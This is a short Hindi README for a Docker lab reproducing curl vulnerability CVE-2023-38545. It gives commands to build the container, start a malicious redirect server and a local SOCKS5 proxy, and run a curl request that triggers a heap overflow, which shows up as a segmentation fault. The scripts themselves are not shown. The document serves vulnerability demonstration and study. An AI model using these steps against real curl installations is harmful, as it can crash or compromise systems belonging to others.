
Dockerfile जिसमें एक्सप्लॉइट के प्रदर्शन हेतु सभी आवश्यक सेटअप फ़ाइलें शामिल हैं।
यह cURL CVE-2023-38545 को प्रदर्शित करता है। यह जितना हल्का हो सकता था, मैंने उतना हल्का बनाया है।
पहले, Docker इमेज बनाएं:
docker build . -t cveimage
इसके बाद, हम आसानी से इमेज फ़ाइल चला सकते हैं, एक अस्थायी Docker कंटेनर बनाते हैं जो कंटेनर रुकते ही हटा दिया जाएगा:
docker run --rm --tty --net="host" --name cvecontainer cveimage
यदि आपको कमांड टाइप करने में कठिनाई हो रही है, तो बस एक और टर्मिनल खोलें और चलाएं:
docker exec -it cvecontainer /bin/bash
अब, हमें सभी सेवाएं शुरू करनी हैं। पहले से चल रहे कंटेनर से कनेक्ट करें, और चलाएं:
./exploit/malicious_redirect_server.sh &
python3 /exploit/proxy.py &
अब, कंटेनर के अंदर से आप cURL एक्सप्लॉइट को क्रियाशील देख सकते हैं:
curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000
यह जानने के लिए कि एक्सप्लॉइट सफल हुआ, आपको उस मशीन पर segmentation fault त्रुटि देखनी चाहिए जिसने curl कमांड चलाया। यदि आप यह नहीं देखते हैं, तो या तो एक्सप्लॉइट नहीं हुआ, या प्रक्रिया के पास इतनी अधिक हीप स्पेस उपलब्ध थी कि आपने दुर्गम मेमोरी में ओवरराइट नहीं किया।